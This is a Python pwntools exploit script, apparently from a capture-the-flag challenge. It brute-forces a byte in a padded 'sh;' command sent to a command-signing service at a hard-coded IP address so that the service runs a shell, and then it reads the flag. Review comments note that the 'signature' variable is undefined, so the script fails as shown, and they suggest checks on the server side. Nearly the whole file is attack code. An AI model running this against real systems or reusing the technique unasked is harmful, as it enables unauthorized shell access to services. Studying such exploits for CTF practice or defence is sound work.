import pwn

# Module-level connection handle shared by sign(), execute() and main().
# It starts as an empty-string placeholder and is rebound to a pwn.remote
# tube inside main() before either helper can use it.
t = ""
def sign(cmd):
    """Ask the service to sign *cmd* and return the signature line.

    Selects menu entry "1" on the module-level tube ``t``, waits for the
    "sign?" prompt, sends *cmd* as-is (``send`` adds no newline), then
    reads the line that follows "signature: \\n" and returns it with the
    newline removed.

    NOTE(review): nothing in this listing calls sign(); the value that
    main() passes to execute() as ``signature`` comes from elsewhere.
    """
    tube = t
    tube.sendline("1")
    tube.recvuntil("sign?")
    tube.send(cmd)
    tube.recvuntil("signature: \n")
    # NOTE(review): str arguments to replace() assume recvuntil() returns
    # str (Python 2 era pwntools) - confirm before running on Python 3.
    return tube.recvuntil("\n").replace("\n", "")
def execute(cmd, sig):
    """Submit *cmd* together with signature *sig* through menu entry "2".

    Uses the module-level tube ``t``: waits for the "run?" prompt, sends
    *cmd* without a trailing newline, waits for the "signature:\\n>_ "
    prompt and sends *sig* as a line. Nothing is read back here; the
    caller consumes whatever the service answers.
    """
    tube = t
    tube.sendline("2")
    tube.recvuntil("run?")
    tube.send(cmd)
    tube.recvuntil("signature:\n>_ ")
    tube.sendline(sig)
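def main():
    """Try each value 0..0xfe for the byte that follows "sh;" in the command.

    Every attempt opens a fresh connection, waits for the ">_" prompt and
    submits a 0x100-byte command made of "sh;", the candidate byte, a NUL
    and "A" padding, then sends "cat flag" and hands the session to the
    terminal.

    Seen from the service, this is up to 255 short-lived connections from
    one client, each choosing menu entry 2 with a command of exactly 0x100
    bytes. Presumably the full-length buffer and the varying byte are what
    the target mishandles; checking the command length before verification
    and verifying the signature over exactly the bytes that get executed
    are the checks to review on the server - TODO confirm against its code.
    """
    global t
    for i in range(0xff):
        conn = None
        try:
            pwn.log.info("attack %d" % i)
            conn = t = pwn.remote("54.202.2.54", 9876)
            #t = pwn.connect("127.0.0.1", 31338)
            t.recvuntil(">_")
            change_mode = ("sh;" + chr(i) + "\x00").ljust(0x100, "A")
            # NOTE(review): `signature` is not defined anywhere in this
            # listing, so as pasted this call raises NameError on every
            # iteration; it must be supplied before the loop can do anything.
            execute(change_mode, signature)
            t.sendline("cat flag")
            t.interactive()
        except Exception as exc:
            # The original bare `except:` also swallowed KeyboardInterrupt,
            # so the loop could not be stopped, and it hid the reason for
            # each failure; report the reason and move on to the next byte.
            pwn.log.warning("attempt %d failed: %r" % (i, exc))
        finally:
            # One socket per attempt: close it instead of leaking it.
            if conn is not None:
                conn.close()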
# Run the attempt loop only when executed as a script, not on import.
if __name__ == "__main__":
    main()